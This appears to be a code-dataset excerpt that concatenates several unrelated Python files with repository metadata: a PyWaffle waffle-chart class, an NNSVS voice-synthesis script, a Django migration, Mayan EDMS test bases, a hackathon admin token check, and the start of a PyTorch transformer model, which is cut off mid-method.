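# topleft = (20 + 3*16, 20 + 2*16) = (68, 52); the rogue's animated centre for
# the same cell is (20 + 3*16 + 8, 20 + 2*16 + 8) = (76, 60).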
| 35.671795 | 89 | 0.502156 |
dc8a2fdf395d3f8c44d35ad89a5b0b3e05b5b6b9 | 19,904 | py | Python | pywaffle/waffle.py | tweakimp/PyWaffle | 8c5611221e27f941dd1539147127d73fc6575c64 | ["MIT"] | null | null | null | pywaffle/waffle.py | tweakimp/PyWaffle | 8c5611221e27f941dd1539147127d73fc6575c64 | ["MIT"] | null | null | null | pywaffle/waffle.py | tweakimp/PyWaffle | 8c5611221e27f941dd1539147127d73fc6575c64 | ["MIT"] | null | null | null |
#!/usr/bin/python
# -*-coding: utf-8 -*-
from matplotlib.pyplot import cm
from matplotlib.figure import Figure
from matplotlib.patches import Rectangle, Patch
import matplotlib.font_manager as fm
from matplotlib.text import Text
from matplotlib.legend_handler import HandlerBase
import copy
import os
import font
from itertools import product
import warnings
from typing import List, Tuple, Union
import math
METHOD_MAPPING = {
'float': lambda a, b: a / b,
'nearest': lambda a, b: round(a / b),
'ceil': lambda a, b: math.ceil(a/b),
'floor': lambda a, b: a // b,
}
def division(x: int, y: int, method: str = 'float') -> Union[int, float]:
"""
:param x: dividend
:param y: divisor
:param method: {'float', 'nearest', 'ceil', 'floor'}
"""
return METHOD_MAPPING[method.lower()](x, y)
def array_resize(array: Union[Tuple, List], length: int, array_len: int = None):
"""
    Resize an array to a given length. If the array is shorter than the given length, repeat it;
    if it is longer, trim it.
    :param array: source array
    :param length: target length
    :param array_len: if the length of the original array is already known, pass it in here
    :return: extended (or trimmed) array
"""
if not array_len:
array_len = len(array)
return array * (length // array_len) + array[:length % array_len]
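# Illustrative values for the helpers above (comments only, nothing executed):
#   division(7, 3, 'float')   -> 2.333...
#   division(7, 3, 'nearest') -> 2
#   division(7, 3, 'ceil')    -> 3
#   division(7, 3, 'floor')   -> 2
#   array_resize([1, 2, 3], length=5) -> [1, 2, 3, 1, 2]
#   array_resize([1, 2, 3], length=2) -> [1, 2]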
_FONT_PATH = font.__path__[0]
FONTAWESOME_FILES = {
'brands': os.path.join(_FONT_PATH, 'Font Awesome 5 Brands-Regular-400.otf'),
'solid': os.path.join(_FONT_PATH, 'Font Awesome 5 Free-Solid-900.otf'),
'regular': os.path.join(_FONT_PATH, 'Font Awesome 5 Free-Regular-400.otf'),
}
class TextLegendBase(object):
def __init__(self, text, color, **kwargs):
self.text = text
self.color = color
self.kwargs = kwargs
class SolidTextLegend(TextLegendBase):
def __init__(self, text, color, **kwargs):
super().__init__(text, color, **kwargs)
class RegularTextLegend(TextLegendBase):
def __init__(self, text, color, **kwargs):
super().__init__(text, color, **kwargs)
class BrandsTextLegend(TextLegendBase):
def __init__(self, text, color, **kwargs):
super().__init__(text, color, **kwargs)
LEGENDSTYLE = {'solid': SolidTextLegend, 'regular': RegularTextLegend, 'brands': BrandsTextLegend}
class TextLegendHandler(HandlerBase):
def __init__(self, font_file):
super().__init__()
self.font_file = font_file
def create_artists(self, legend, orig_handle, xdescent, ydescent, width, height, fontsize, trans):
x = xdescent + width / 2.0
y = ydescent + height / 2.0
kwargs = {
'horizontalalignment': 'center',
'verticalalignment': 'center',
'color': orig_handle.color,
'fontproperties': fm.FontProperties(fname=self.font_file, size=fontsize)
}
kwargs.update(orig_handle.kwargs)
annotation = Text(x, y, orig_handle.text, **kwargs)
return [annotation]
HANDLER_MAP = {
SolidTextLegend: TextLegendHandler(FONTAWESOME_FILES['solid']),
RegularTextLegend: TextLegendHandler(FONTAWESOME_FILES['regular']),
BrandsTextLegend: TextLegendHandler(FONTAWESOME_FILES['brands'])
}
class Waffle(Figure):
"""
A custom Figure class to make waffle charts.
:param values: Numerical value of each category. If it is a dict, the keys would be used as labels.
:type values: list|dict|pandas.Series
:param rows: The number of lines of the waffle chart. This is required unless it is specified in argument plots.
:type rows: int
:param columns: The number of columns of the waffle chart.
If it is not None, the total number of blocks would be decided through rows and columns. [Default None]
:type columns: int
:param colors: A list of colors for each category. Its length should be the same as values.
Default values are from Set2 colormap.
:type colors: list[str]|tuple[str]
:param labels: The name of each category.
If the values is a dict, this parameter would be replaced by the keys of values.
:type labels: list[str]|tuple[str]
:param legend: Parameters of matplotlib.pyplot.legend in a dict.
E.g. {'loc': '', 'bbox_to_anchor': (,), ...}
See full parameter list in https://matplotlib.org/api/_as_gen/matplotlib.pyplot.legend.html
:type legend: dict
:param interval_ratio_x: Ratio of horizontal distance between blocks to block's width. [Default 0.2]
:type interval_ratio_x: float
:param interval_ratio_y: Ratio of vertical distance between blocks to block's height. [Default 0.2]
:type interval_ratio_y: float
:param block_aspect_ratio: The ratio of block's width to height. [Default 1]
:type block_aspect_ratio: float
:param cmap_name: Name of colormaps for default color, if colors is not assigned.
See full list in https://matplotlib.org/examples/color/colormaps_reference.html [Default 'Set2']
:type cmap_name: str
:param title: Parameters of matplotlib.axes.Axes.set_title in a dict.
E.g. {'label': '', 'fontdict': {}, 'loc': ''}
See full parameter list in https://matplotlib.org/api/_as_gen/matplotlib.axes.Axes.set_title.html
:type title: dict
:param icons: Icon name of Font Awesome. If it is a string, all categories use the same icon;
If it's a list or tuple of icons, the length should be the same as values.
See the full list of Font Awesome on https://fontawesome.com/icons?d=gallery&m=free [Default None]
:type icons: str|list[str]|tuple[str]
:param icon_set: Deprecated. {'brands', 'regular', 'solid'}
The style of icons to be used.
[Default 'solid']
:type icon_set: str|list[str]|tuple[str]
:param icon_style: The style of icons to be used.
Font Awesome Icons find an icon by style and icon name. The style could be 'brands', 'regular' and 'solid'.
Visit https://fontawesome.com/cheatsheet for detail.
If it is a string, it would search icons within given style. If it is a list or a tuple, the length should be
the same as values and it means the style for each icon.
[Default 'solid']
:type icon_style: str|list[str]|tuple[str]
    :param icon_size: Font size of the icons.
        The default size is not fixed and depends on the block size.
        Either a relative value of 'xx-small', 'x-small', 'small', 'medium', 'large', 'x-large', 'xx-large' or an absolute font size, e.g., 12
:type icon_size: int
:param icon_legend: Whether to use icon but not color bar in legend. [Default False]
:type icon_legend: bool
:param plot_anchor: {'C', 'SW', 'S', 'SE', 'E', 'NE', 'N', 'NW', 'W'}
The alignment method of subplots.
See details in https://matplotlib.org/devdocs/api/_as_gen/matplotlib.axes.Axes.set_anchor.html
[Default 'W']
:type plot_anchor: str
:param plots: Location and parameters of Waffle class for subplots in a dict,
with format like {loc: {subplot_args: values, }, }.
loc is a 3-digit integer. If the three integers are I, J, and K,
the subplot is the Ith plot on a grid with J rows and K columns.
The parameters of subplots are the same as Waffle class parameters, excluding plots itself.
Nested subplots is not supported.
If any parameter of subplots is not assigned, it use the same parameter in Waffle class as default value.
:type plots: dict
:param plot_direction: Deprecated. {'NW', 'SW', 'NE', 'SE'}
Use starting_location instead.
Change the starting location plotting the blocks.
'NW' means plots start at upper left and end at lower right;
For 'SW', plots start at lower left and end at upper right;
For 'NE', plots start at upper right and end at lower left;
For 'SE', plots start at lower right and end at upper left.
[Default 'SW']
:type plot_direction: str
:param vertical: decide whether to draw the plot vertically or horizontally.
[Default False]
:type vertical: bool
:param starting_location: {'NW', 'SW', 'NE', 'SE'}.
Change the starting location plotting the blocks
'NW' means plots start at upper left;
For 'SW', plots start at lower left;
For 'NE', plots start at upper right;
For 'SE', plots start at lower right.
[Default 'SW']
    :type starting_location: str
:param rounding_rule: {'nearest', 'floor', 'ceil'}.
The rounding rule applied when shrinking values to fit the chart size.
'nearest' means "round to nearest, ties to even" rounding mode;
'floor' means round to less of the two endpoints of the interval;
'ceil' means round to greater of the two endpoints of the interval.
[Default 'nearest']
:type rounding_rule: str
"""
_direction_values = {
'NW': {
'column_order': 1,
'row_order': -1,
},
'SW': {
'column_order': 1,
'row_order': 1,
},
'NE': {
'column_order': -1,
'row_order': 1,
},
'SE': {
'column_order': -1,
'row_order': -1,
},
}
def __init__(self, *args, **kwargs):
self.fig_args = {
'values': kwargs.pop('values', []),
'rows': kwargs.pop('rows', None),
'columns': kwargs.pop('columns', None),
'colors': kwargs.pop('colors', None),
'labels': kwargs.pop('labels', None),
'legend': kwargs.pop('legend', {}),
'icons': kwargs.pop('icons', None),
'icon_size': kwargs.pop('icon_size', None),
'icon_set': kwargs.pop('icon_set', 'solid'), # Deprecated
'icon_style': kwargs.pop('icon_style', 'solid'),
'icon_legend': kwargs.pop('icon_legend', False),
'interval_ratio_x': kwargs.pop('interval_ratio_x', 0.2),
'interval_ratio_y': kwargs.pop('interval_ratio_y', 0.2),
'block_aspect_ratio': kwargs.pop('block_aspect_ratio', 1),
'cmap_name': kwargs.pop('cmap_name', 'Set2'),
'title': kwargs.pop('title', None),
'plot_anchor': kwargs.pop('plot_anchor', 'W'),
'plot_direction': kwargs.pop('plot_direction', ''), # Deprecated
'vertical': kwargs.pop('vertical', False),
'starting_location': kwargs.pop('starting_location', 'SW'),
'rounding_rule': kwargs.pop('rounding_rule', 'nearest'),
}
self.plots = kwargs.pop('plots', None)
# If plots is empty, make a single waffle chart
if self.plots is None:
self.plots = {111: self.fig_args}
Figure.__init__(self, *args, **kwargs)
for loc, setting in self.plots.items():
self._waffle(loc, **copy.deepcopy(setting))
# Adjust the layout
self.set_tight_layout(True)
def _waffle(self, loc, **kwargs):
# _pa is the arguments for this single plot
self._pa = kwargs
# Append figure args to plot args
plot_fig_args = copy.deepcopy(self.fig_args)
for arg, v in plot_fig_args.items():
if arg not in self._pa:
self._pa[arg] = v
# Parameter Validation
self._pa['rounding_rule'] = self._pa['rounding_rule'].lower()
if self._pa['rounding_rule'] not in ('nearest', 'ceil', 'floor'):
raise ValueError("Argument rounding_rule should be one of nearest, ceil or floor.")
if len(self._pa['values']) == 0 or not self._pa['rows']:
raise ValueError("Argument values or rows is required.")
self.values_len = len(self._pa['values'])
if self._pa['colors'] and len(self._pa['colors']) != self.values_len:
raise ValueError("Length of colors doesn't match the values.")
        # labels and values
if isinstance(self._pa['values'], dict):
if not self._pa['labels']:
self._pa['labels'] = self._pa['values'].keys()
self._pa['values'] = list(self._pa['values'].values())
if self._pa['labels'] and len(self._pa['labels']) != self.values_len:
raise ValueError("Length of labels doesn't match the values.")
self.ax = self.add_subplot(loc, aspect='equal')
# Alignment of subplots
self.ax.set_anchor(self._pa['plot_anchor'])
self.value_sum = sum(self._pa['values'])
        # If the column number is not given, infer it so the chart holds one block per unit of value
if self._pa['columns'] is None:
self._pa['columns'] = division(self.value_sum, self._pa['rows'], method='ceil')
block_number_per_cat = self._pa['values']
else:
block_number_per_cat = [
division(v * self._pa['columns'] * self._pa['rows'], self.value_sum, method=self._pa['rounding_rule'])
for v in self._pa['values']
]
# Absolute height of the plot
figure_height = 1
block_y_length = figure_height / (
self._pa['rows'] + self._pa['rows'] * self._pa['interval_ratio_y'] - self._pa['interval_ratio_y']
)
block_x_length = self._pa['block_aspect_ratio'] * block_y_length
# Define the limit of X, Y axis
self.ax.axis(
xmin=0,
xmax=(
self._pa['columns'] + self._pa['columns'] * self._pa['interval_ratio_x'] - self._pa['interval_ratio_x']
) * block_x_length,
ymin=0,
ymax=figure_height
)
# Build a color sequence if colors is empty
if not self._pa['colors']:
default_colors = cm.get_cmap(self._pa['cmap_name']).colors
default_color_num = cm.get_cmap(self._pa['cmap_name']).N
self._pa['colors'] = array_resize(array=default_colors, length=self.values_len, array_len=default_color_num)
# Set icons
if self._pa['icons']:
from pywaffle.fontawesome_mapping import icons
# TODO: deprecating icon_set
if self._pa['icon_set'] != 'solid' and self._pa['icon_style'] == 'solid':
self._pa['icon_style'] = self._pa['icon_set']
warnings.warn(
"Parameter icon_set is deprecated and will be removed in future version. Use icon_style instead.",
DeprecationWarning
)
            # If icon_style is a string, convert it into a list repeating that style; its length equals the number of values
# 'solid' -> ['solid', 'solid', 'solid', ]
if isinstance(self._pa['icon_style'], str):
self._pa['icon_style'] = [self._pa['icon_style'].lower()] * self.values_len
elif set(self._pa['icon_style']) - set(icons.keys()):
                raise KeyError('icon_style should be one of {}'.format(', '.join(icons.keys())))
            # If icons is a string, convert it into a list of the same icon; its length equals the number of values
# '\uf26e' -> ['\uf26e', '\uf26e', '\uf26e', ]
if isinstance(self._pa['icons'], str):
self._pa['icons'] = [self._pa['icons']] * self.values_len
if len(self._pa['icons']) != self.values_len:
raise ValueError("Length of icons doesn't match the values.")
# Replace icon name with Unicode symbols in parameter icons
self._pa['icons'] = [
icons[icon_style][icon_name]
for icon_name, icon_style in zip(self._pa['icons'], self._pa['icon_style'])
]
# Calculate icon size based on the block size
tx, ty = self.ax.transData.transform([(0, 0), (0, block_x_length)])
prop = fm.FontProperties(size=self._pa['icon_size'] or int((ty[1] - tx[1]) / 16 * 12))
plot_direction = self._pa['plot_direction'].upper()
if plot_direction:
warnings.warn(
"Parameter plot_direction is deprecated and will be removed in future version. Use starting_location instead.",
DeprecationWarning
)
starting_location = self._pa['plot_direction'].upper()
else:
# TODO: starting_location will replace plot_direction in 0.3.0
starting_location = self._pa['starting_location'].upper()
try:
column_order = self._direction_values[starting_location]['column_order']
row_order = self._direction_values[starting_location]['row_order']
except KeyError:
raise KeyError("starting_location should be one of 'NW', 'SW', 'NE', 'SE'")
if self.fig_args['vertical']:
block_iter = (
c[::-1]
for c in product(range(self._pa['rows'])[::row_order],
range(self._pa['columns'])[::column_order])
)
else:
block_iter = product(range(self._pa['columns'])[::column_order], range(self._pa['rows'])[::row_order])
# Plot blocks
class_index = 0
block_index = 0
x_full = (1 + self._pa['interval_ratio_x']) * block_x_length
y_full = (1 + self._pa['interval_ratio_y']) * block_y_length
for col, row in block_iter:
if block_number_per_cat[class_index] == 0:
class_index += 1
if class_index > self.values_len - 1:
break
elif block_number_per_cat[class_index] < 0:
raise ValueError("Negative value is not acceptable")
x = x_full * col
y = y_full * row
if self._pa['icons']:
prop.set_file(FONTAWESOME_FILES[self._pa['icon_style'][class_index]])
self.ax.text(
x=x,
y=y,
s=self._pa['icons'][class_index],
color=self._pa['colors'][class_index],
fontproperties=prop
)
else:
self.ax.add_artist(
Rectangle(
xy=(x, y), width=block_x_length, height=block_y_length, color=self._pa['colors'][class_index]
)
)
block_index += 1
if block_index >= sum(block_number_per_cat[:class_index + 1]):
class_index += 1
if class_index > self.values_len - 1:
break
# Add title
if self._pa['title'] is not None:
self.ax.set_title(**self._pa['title'])
# Add legend
if self._pa['labels'] or 'labels' in self._pa['legend']:
labels = self._pa['labels'] or self._pa['legend'].get('labels')
if self._pa['icons'] and self._pa['icon_legend'] is True:
self._pa['legend']['handles'] = [
LEGENDSTYLE[style](color=color, text=icon)
for color, icon, style in zip(self._pa['colors'], self._pa['icons'], self._pa['icon_style'])
]
self._pa['legend']['handler_map'] = HANDLER_MAP
# elif not self._pa['legend'].get('handles'):
elif 'handles' not in self._pa['legend']:
self._pa['legend']['handles'] = [
Patch(color=c, label=str(l)) for c, l in zip(self._pa['colors'], labels)
]
# labels is an alias of legend['labels']
if 'labels' not in self._pa['legend'] and self._pa['labels']:
self._pa['legend']['labels'] = self._pa['labels']
if 'handles' in self._pa['legend'] and 'labels' in self._pa['legend']:
self.ax.legend(**self._pa['legend'])
# Remove borders, ticks, etc.
self.ax.axis('off')
def remove(self):
pass
| 40.537678
| 143
| 0.600834
|
0b4850c4686e6283e180dd8204017aaedd1c4634
| 9,096
|
py
|
Python
|
nnsvs/bin/synthesis.py
|
r9y9/dnnsvs
|
b028f76fd4f081859ec99a2034e0e0dc8ce1a409
|
[
"MIT"
] | 72
|
2020-04-19T16:14:09.000Z
|
2020-05-02T04:02:05.000Z
|
nnsvs/bin/synthesis.py
|
r9y9/dnnsvs
|
b028f76fd4f081859ec99a2034e0e0dc8ce1a409
|
[
"MIT"
] | 1
|
2020-04-19T16:28:03.000Z
|
2020-05-02T13:49:13.000Z
|
nnsvs/bin/synthesis.py
|
r9y9/dnnsvs
|
b028f76fd4f081859ec99a2034e0e0dc8ce1a409
|
[
"MIT"
] | 3
|
2020-04-20T02:34:31.000Z
|
2020-04-26T01:04:35.000Z
|
import os
from os.path import exists, join
import hydra
import joblib
import numpy as np
import pysptk
import pyworld
import torch
from hydra.utils import to_absolute_path
from nnmnkwii.io import hts
from nnmnkwii.postfilters import merlin_post_filter
from nnsvs.gen import (
gen_spsvs_static_features,
gen_world_params,
postprocess_duration,
predict_acoustic,
predict_duration,
predict_timelag,
)
from nnsvs.logger import getLogger
from omegaconf import DictConfig, OmegaConf
from scipy.io import wavfile
from tqdm import tqdm
def synthesis(
config,
device,
label_path,
question_path,
timelag_model,
timelag_config,
timelag_in_scaler,
timelag_out_scaler,
duration_model,
duration_config,
duration_in_scaler,
duration_out_scaler,
acoustic_model,
acoustic_config,
acoustic_in_scaler,
acoustic_out_scaler,
):
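    # Overall flow: predict time-lags and phoneme durations from the labels, rewrite the
    # label timings, predict acoustic features, then convert them to WORLD parameters
    # (mgc/lf0/vuv/bap) and synthesize the waveform.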
# load labels and question
labels = hts.load(label_path).round_()
binary_dict, numeric_dict = hts.load_question_set(
question_path, append_hat_for_LL=False
)
# pitch indices in the input features
    # TODO: make this configurable
pitch_idx = len(binary_dict) + 1
pitch_indices = np.arange(len(binary_dict), len(binary_dict) + 3)
log_f0_conditioning = config.log_f0_conditioning
# Clipping settings
# setting True by default for backward compatibility
timelag_clip_input_features = (
config.timelag.force_clip_input_features
if "force_clip_input_features" in config.timelag
else True
)
duration_clip_input_features = (
config.duration.force_clip_input_features
if "force_clip_input_features" in config.duration
else True
)
acoustic_clip_input_features = (
config.acoustic.force_clip_input_features
if "force_clip_input_features" in config.acoustic
else True
)
if config.ground_truth_duration:
# Use provided alignment
duration_modified_labels = labels
else:
# Time-lag
lag = predict_timelag(
device,
labels,
timelag_model,
timelag_config,
timelag_in_scaler,
timelag_out_scaler,
binary_dict,
numeric_dict,
pitch_indices,
log_f0_conditioning,
config.timelag.allowed_range,
config.timelag.allowed_range_rest,
timelag_clip_input_features,
)
# Duration predictions
durations = predict_duration(
device,
labels,
duration_model,
duration_config,
duration_in_scaler,
duration_out_scaler,
binary_dict,
numeric_dict,
pitch_indices,
log_f0_conditioning,
duration_clip_input_features,
)
# Normalize phoneme durations
duration_modified_labels = postprocess_duration(labels, durations, lag)
# Predict acoustic features
acoustic_features = predict_acoustic(
device,
duration_modified_labels,
acoustic_model,
acoustic_config,
acoustic_in_scaler,
acoustic_out_scaler,
binary_dict,
numeric_dict,
config.acoustic.subphone_features,
pitch_indices,
log_f0_conditioning,
acoustic_clip_input_features,
)
# Generate WORLD parameters
mgc, lf0, vuv, bap = gen_spsvs_static_features(
duration_modified_labels,
acoustic_features,
binary_dict,
numeric_dict,
acoustic_config.stream_sizes,
acoustic_config.has_dynamic_features,
config.acoustic.subphone_features,
pitch_idx,
acoustic_config.num_windows,
config.frame_period,
config.acoustic.relative_f0,
config.vibrato_scale,
)
if config.acoustic.post_filter:
alpha = pysptk.util.mcepalpha(config.sample_rate)
mgc = merlin_post_filter(mgc, alpha)
f0, spectrogram, aperiodicity = gen_world_params(
mgc, lf0, vuv, bap, config.sample_rate
)
wav = pyworld.synthesize(
f0, spectrogram, aperiodicity, config.sample_rate, config.frame_period
)
return wav
@hydra.main(config_path="conf/synthesis", config_name="config")
def my_app(config: DictConfig) -> None:
global logger
logger = getLogger(config.verbose)
logger.info(OmegaConf.to_yaml(config))
if not torch.cuda.is_available():
device = torch.device("cpu")
else:
device = torch.device(config.device)
# timelag
timelag_config = OmegaConf.load(to_absolute_path(config.timelag.model_yaml))
timelag_model = hydra.utils.instantiate(timelag_config.netG).to(device)
checkpoint = torch.load(
to_absolute_path(config.timelag.checkpoint),
map_location=lambda storage, loc: storage,
)
timelag_model.load_state_dict(checkpoint["state_dict"])
timelag_in_scaler = joblib.load(to_absolute_path(config.timelag.in_scaler_path))
timelag_out_scaler = joblib.load(to_absolute_path(config.timelag.out_scaler_path))
timelag_model.eval()
# duration
duration_config = OmegaConf.load(to_absolute_path(config.duration.model_yaml))
duration_model = hydra.utils.instantiate(duration_config.netG).to(device)
checkpoint = torch.load(
to_absolute_path(config.duration.checkpoint),
map_location=lambda storage, loc: storage,
)
duration_model.load_state_dict(checkpoint["state_dict"])
duration_in_scaler = joblib.load(to_absolute_path(config.duration.in_scaler_path))
duration_out_scaler = joblib.load(to_absolute_path(config.duration.out_scaler_path))
duration_model.eval()
# acoustic model
acoustic_config = OmegaConf.load(to_absolute_path(config.acoustic.model_yaml))
acoustic_model = hydra.utils.instantiate(acoustic_config.netG).to(device)
checkpoint = torch.load(
to_absolute_path(config.acoustic.checkpoint),
map_location=lambda storage, loc: storage,
)
acoustic_model.load_state_dict(checkpoint["state_dict"])
acoustic_in_scaler = joblib.load(to_absolute_path(config.acoustic.in_scaler_path))
acoustic_out_scaler = joblib.load(to_absolute_path(config.acoustic.out_scaler_path))
acoustic_model.eval()
# Run synthesis for each utt.
question_path = to_absolute_path(config.question_path)
if config.utt_list is not None:
in_dir = to_absolute_path(config.in_dir)
out_dir = to_absolute_path(config.out_dir)
os.makedirs(out_dir, exist_ok=True)
with open(to_absolute_path(config.utt_list)) as f:
lines = list(filter(lambda s: len(s.strip()) > 0, f.readlines()))
logger.info("Processes %s utterances...", len(lines))
for idx in tqdm(range(len(lines))):
utt_id = lines[idx].strip()
label_path = join(in_dir, f"{utt_id}.lab")
if not exists(label_path):
raise RuntimeError(f"Label file does not exist: {label_path}")
wav = synthesis(
config,
device,
label_path,
question_path,
timelag_model,
timelag_config,
timelag_in_scaler,
timelag_out_scaler,
duration_model,
duration_config,
duration_in_scaler,
duration_out_scaler,
acoustic_model,
acoustic_config,
acoustic_in_scaler,
acoustic_out_scaler,
)
wav = np.clip(wav, -32768, 32767)
if config.gain_normalize:
wav = wav / np.max(np.abs(wav)) * 32767
out_wav_path = join(out_dir, f"{utt_id}.wav")
wavfile.write(
out_wav_path, rate=config.sample_rate, data=wav.astype(np.int16)
)
else:
assert config.label_path is not None
logger.info("Process the label file: %s", config.label_path)
label_path = to_absolute_path(config.label_path)
out_wav_path = to_absolute_path(config.out_wav_path)
wav = synthesis(
config,
device,
label_path,
question_path,
timelag_model,
timelag_config,
timelag_in_scaler,
timelag_out_scaler,
duration_model,
duration_config,
duration_in_scaler,
duration_out_scaler,
acoustic_model,
acoustic_config,
acoustic_in_scaler,
acoustic_out_scaler,
)
wav = wav / np.max(np.abs(wav)) * (2 ** 15 - 1)
wavfile.write(out_wav_path, rate=config.sample_rate, data=wav.astype(np.int16))
def entry():
my_app() # pylint: disable=no-value-for-parameter
if __name__ == "__main__":
my_app() # pylint: disable=no-value-for-parameter
| 31.915789
| 88
| 0.645119
|
0ed88cc85dc69ea210a47756ab3eb4c478e9882e
| 1,497
|
py
|
Python
|
api/addresses/migrations/0002_auto_20200326_1420.py
|
django-doctor/lite-api
|
1ba278ba22ebcbb977dd7c31dd3701151cd036bf
|
[
"MIT"
] | null | null | null |
api/addresses/migrations/0002_auto_20200326_1420.py
|
django-doctor/lite-api
|
1ba278ba22ebcbb977dd7c31dd3701151cd036bf
|
[
"MIT"
] | null | null | null |
api/addresses/migrations/0002_auto_20200326_1420.py
|
django-doctor/lite-api
|
1ba278ba22ebcbb977dd7c31dd3701151cd036bf
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2.11 on 2020-03-26 14:20
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("addresses", "0001_initial"),
]
operations = [
migrations.AddField(
model_name="address",
name="address",
field=models.CharField(
blank=True, default=None, help_text="Used for addresses not in the UK", max_length=256, null=True
),
),
migrations.AlterField(
model_name="address",
name="address_line_1",
field=models.CharField(blank=True, default=None, max_length=50, null=True),
),
migrations.AlterField(
model_name="address",
name="address_line_2",
field=models.CharField(blank=True, default=None, max_length=50, null=True),
),
migrations.AlterField(
model_name="address", name="city", field=models.CharField(default=None, max_length=50, null=True),
),
migrations.AlterField(
model_name="address",
name="postcode",
field=models.CharField(blank=True, default=None, max_length=10, null=True),
),
migrations.AlterField(
model_name="address",
name="region",
field=models.CharField(blank=True, default=None, max_length=50, null=True),
),
migrations.AlterModelTable(name="address", table="address",),
]
| 33.266667
| 113
| 0.585838
|
be7ccf7dcce0254ee4c379415b2784bd6fc85edc
| 357
|
py
|
Python
|
mayan/apps/documents/tests/base.py
|
sophiawa/Mayan-EDMS
|
42f20576d0c690b645a60bf53c5169cda4264231
|
[
"Apache-2.0"
] | null | null | null |
mayan/apps/documents/tests/base.py
|
sophiawa/Mayan-EDMS
|
42f20576d0c690b645a60bf53c5169cda4264231
|
[
"Apache-2.0"
] | 10
|
2021-03-19T23:48:12.000Z
|
2022-03-12T00:41:49.000Z
|
mayan/apps/documents/tests/base.py
|
sophiawa/Mayan-EDMS
|
42f20576d0c690b645a60bf53c5169cda4264231
|
[
"Apache-2.0"
] | 1
|
2020-12-17T02:35:09.000Z
|
2020-12-17T02:35:09.000Z
|
from mayan.apps.common.tests.base import BaseTestCase, GenericViewTestCase
from .mixins import DocumentTestMixin
class GenericDocumentTestCase(DocumentTestMixin, BaseTestCase):
"""Base test case when testing models or classes"""
class GenericDocumentViewTestCase(DocumentTestMixin, GenericViewTestCase):
"""Base test case when testing views"""
| 29.75
| 74
| 0.809524
|
205434e509ff3c8a8b9e92e31c8d11260d548367
| 897
|
py
|
Python
|
open-hackathon/src/hackathon/admin/admin_mgr.py
|
Fendoe/LABOSS
|
7f90e4627196ada7caf235115c0cc6fbd183c379
|
[
"Apache-2.0"
] | null | null | null |
open-hackathon/src/hackathon/admin/admin_mgr.py
|
Fendoe/LABOSS
|
7f90e4627196ada7caf235115c0cc6fbd183c379
|
[
"Apache-2.0"
] | null | null | null |
open-hackathon/src/hackathon/admin/admin_mgr.py
|
Fendoe/LABOSS
|
7f90e4627196ada7caf235115c0cc6fbd183c379
|
[
"Apache-2.0"
] | null | null | null |
import sys
sys.path.append("..")
from hackathon.database.models import *
from hackathon.log import log
from hackathon.database import db_adapter
from datetime import datetime, timedelta
from hackathon.constants import HTTP_HEADER
from flask import request, g
class AdminManager(object):
def __init__(self, db_adapter):
self.db = db_adapter
def __validate_token(self, token):
t = self.db.find_first_object(AdminToken, token=token)
if t is not None and t.expire_date >= datetime.utcnow():
return t.admin
return None
def validate_request(self):
if HTTP_HEADER.TOKEN not in request.headers:
return False
admin = self.__validate_token(request.headers[HTTP_HEADER.TOKEN])
if admin is None:
return False
g.admin = admin
return True
admin_manager = AdminManager(db_adapter)
| 24.243243
| 73
| 0.690078
|
d6b7dbaf5e43b0d5b627baca1d0c2f6cadbbc9ce
| 10,078
|
py
|
Python
|
model_pytorch.py
|
sohuren/pytorch-openai-transformer-lm
|
55ba4d78407ae12c7454dc8f3342f476be3dece5
|
[
"MIT"
] | 1
|
2018-07-08T19:18:44.000Z
|
2018-07-08T19:18:44.000Z
|
model_pytorch.py
|
sohuren/pytorch-openai-transformer-lm
|
55ba4d78407ae12c7454dc8f3342f476be3dece5
|
[
"MIT"
] | null | null | null |
model_pytorch.py
|
sohuren/pytorch-openai-transformer-lm
|
55ba4d78407ae12c7454dc8f3342f476be3dece5
|
[
"MIT"
] | null | null | null |
import copy
import json
import math
import re
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.parameter import Parameter
def gelu(x):
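    # Tanh approximation of the Gaussian Error Linear Unit (GELU) activation.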
return 0.5 * x * (1 + torch.tanh(math.sqrt(2 / math.pi) * (x + 0.044715 * torch.pow(x, 3))))
def swish(x):
return x * torch.sigmoid(x)
ACT_FNS = {
'relu': nn.ReLU,
'swish': swish,
'gelu': gelu
}
class LayerNorm(nn.Module):
"Construct a layernorm module in the OpenAI style (epsilon inside the square root)."
def __init__(self, n_state, e=1e-5):
super(LayerNorm, self).__init__()
self.g = nn.Parameter(torch.ones(n_state))
self.b = nn.Parameter(torch.zeros(n_state))
self.e = e
def forward(self, x):
u = x.mean(-1, keepdim=True)
s = (x - u).pow(2).mean(-1, keepdim=True)
x = (x - u) / torch.sqrt(s + self.e)
return self.g * x + self.b
class Conv1D(nn.Module):
def __init__(self, nf, rf, nx):
super(Conv1D, self).__init__()
self.rf = rf
self.nf = nf
if rf == 1: # faster 1x1 conv
w = torch.empty(nx, nf)
nn.init.normal_(w, std=0.02)
self.w = Parameter(w)
self.b = Parameter(torch.zeros(nf))
else: # was used to train LM
raise NotImplementedError
def forward(self, x):
if self.rf == 1:
size_out = x.size()[:-1] + (self.nf,)
x = torch.addmm(self.b, x.view(-1, x.size(-1)), self.w)
x = x.view(*size_out)
else:
raise NotImplementedError
return x
class Attention(nn.Module):
def __init__(self, nx, n_ctx, cfg, scale=False):
super(Attention, self).__init__()
n_state = nx # in Attention: n_state=768 (nx=n_embd)
# [switch nx => n_state from Block to Attention to keep identical to TF implem]
assert n_state % cfg.n_head == 0
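        # Lower-triangular causal mask: each position may attend only to itself and
        # earlier positions.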
self.register_buffer('b', torch.tril(torch.ones(n_ctx, n_ctx)).view(1, 1, n_ctx, n_ctx))
self.n_head = cfg.n_head
self.split_size = n_state
self.scale = scale
self.c_attn = Conv1D(n_state * 3, 1, nx)
self.c_proj = Conv1D(n_state, 1, nx)
self.attn_dropout = nn.Dropout(cfg.attn_pdrop)
self.resid_dropout = nn.Dropout(cfg.resid_pdrop)
def _attn(self, q, k, v):
w = torch.matmul(q, k)
if self.scale:
w = w / math.sqrt(v.size(-1))
w = w * self.b + -1e9 * (1 - self.b) # TF implem method: mask_attn_weights
w = nn.Softmax(dim=-1)(w)
w = self.attn_dropout(w)
return torch.matmul(w, v)
def merge_heads(self, x):
x = x.permute(0, 2, 1, 3).contiguous()
new_x_shape = x.size()[:-2] + (x.size(-2) * x.size(-1),)
return x.view(*new_x_shape) # in Tensorflow implem: fct merge_states
def split_heads(self, x, k=False):
